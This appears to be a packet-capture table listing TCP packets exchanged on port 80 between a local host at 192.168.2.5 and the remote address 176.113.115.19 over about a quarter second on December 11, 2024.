Dec 11, 2024 08:57:00.504017115 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.504060030 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.505942106 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.505989075 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.505997896 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.506028891 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.507953882 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.508009911 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.508047104 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.508090019 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.509989023 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.510067940 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.510092974 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.510138988 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.512000084 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.512059927 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.512092113 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.512141943 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.514092922 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.514147043 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.514172077 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.514218092 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.516032934 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.516087055 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.516141891 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.516181946 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.518241882 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.518261909 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.518287897 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.518301010 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.520055056 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.520124912 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.520162106 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.520203114 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.522070885 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.522114992 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.522157907 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.522202969 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.524096012 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.524144888 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.524224997 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.524260044 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.526120901 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.526174068 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.526294947 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.526339054 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.528147936 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.528198004 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.528300047 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.528342009 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.530117989 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.530276060 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.530304909 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.530356884 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.532126904 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.532179117 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.532208920 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.532244921 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.534112930 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.534179926 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.534281969 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.534332037 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.536077023 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.536132097 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.536190987 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.536245108 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.538192034 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.538265944 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.538302898 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.538351059 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.540148020 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.540210962 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.540261984 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.540340900 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.542162895 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.542227983 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.542258978 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.542318106 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.544219017 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.544271946 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.544341087 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.544395924 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.545948029 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.546011925 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.546050072 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.546103001 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.547869921 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.547914028 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.547982931 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.548036098 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.549719095 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.549787045 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.549808979 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.549865961 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.551640987 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.551716089 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.551749945 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.551795006 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.553617954 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.553668976 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.553677082 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.553723097 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.555624008 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.555685997 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.555752039 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.555797100 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.557456970 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.557524920 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.557579041 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.557626009 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.559374094 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.559431076 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.559473038 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.559521914 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.561325073 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.561373949 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.561397076 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.561445951 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.563307047 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.563371897 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.563410044 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.563455105 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.565186024 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.565241098 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.565300941 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.565350056 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.567173004 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.567224026 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.567256927 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.567307949 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.569113970 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.569175005 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.569310904 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.569365978 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.571192026 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.571239948 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.571343899 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.571398020 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.573201895 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.573270082 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.573378086 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.573443890 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.574872017 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.574924946 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.574956894 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.575000048 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.576858044 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.576942921 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.576997042 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.577044964 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.578953981 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.579050064 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.579112053 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.579163074 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.580683947 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.580739021 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.580782890 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.580827951 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.680428028 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.680536032 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.680572033 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.680624008 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.681027889 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.681087971 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.681126118 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.681171894 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.682346106 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.682404995 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.682543993 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.682595015 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.683653116 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.683708906 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.683866978 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.683924913 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.684947968 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.684998989 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.685036898 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.685085058 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.686261892 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.686307907 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.686368942 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.686424017 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.687597036 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.687639952 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.687697887 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.687750101 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.688848972 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.688910961 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.688952923 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.688999891 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.690247059 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.690296888 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.690371037 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.690421104 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.691483974 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.691549063 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.691679001 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.691729069 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.692712069 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.692765951 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.692802906 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.692848921 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.693931103 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.693979979 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.694051027 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.694108009 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.695199013 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.695252895 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.695295095 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.695338964 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.696435928 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.696485043 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.696571112 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.696619034 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.697643995 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.697695017 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.697758913 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.697808981 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.698872089 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.698925018 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.698973894 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.699022055 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.700048923 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.700094938 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.700170994 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.700210094 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.701386929 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.701440096 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.701503992 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.701566935 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.702460051 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.702508926 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.702581882 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.702635050 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.703659058 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.703710079 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.703738928 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.703788042 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.704888105 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.704943895 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.704951048 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.704993010 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.706039906 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.706089020 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.706156015 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.706203938 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.707242012 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.707295895 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.707376003 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.707426071 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.708465099 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.708513975 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.708564043 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.708619118 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.709652901 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.709702015 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.709739923 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.709786892 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.710803032 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.710863113 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.710932016 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.710985899 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.712019920 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.712094069 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.712167978 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.712218046 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.713207960 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.713260889 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.713319063 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.713367939 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.714405060 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.714461088 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.714498997 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.714550972 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.715594053 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.715641975 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.715768099 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.715817928 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.716784954 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.716835976 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.716877937 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.716926098 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.717972040 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.718022108 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.718090057 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.718137026 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.719161987 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.719234943 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.719363928 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.719417095 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.720376015 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.720426083 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.720458984 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.720514059 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.721575975 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.721623898 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.721678972 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.721724987 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.722739935 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.722805023 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.722863913 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.722910881 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.723956108 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.724003077 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.724040031 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.724082947 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.725140095 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.725189924 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.725241899 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.725290060 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.726327896 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.726375103 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.726430893 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.726480007 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.727528095 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.727571964 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.727652073 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.727694988 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.728723049 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.728768110 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.728771925 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.728811979 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.729924917 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.729970932 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.730031013 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.730077028 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.731245995 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.731307030 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.731389046 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.731434107 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.732583046 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.732630014 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.732666969 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.732712030 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.733575106 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.733644962 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.733654976 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.733695984 CET	49705	80	192.168.2.5	176.113.115.19
Dec 11, 2024 08:57:00.734714985 CET	80	49705	176.113.115.19	192.168.2.5
Dec 11, 2024 08:57:00.734762907 CET	49705	80	192.168.2.5	176.113.115.19
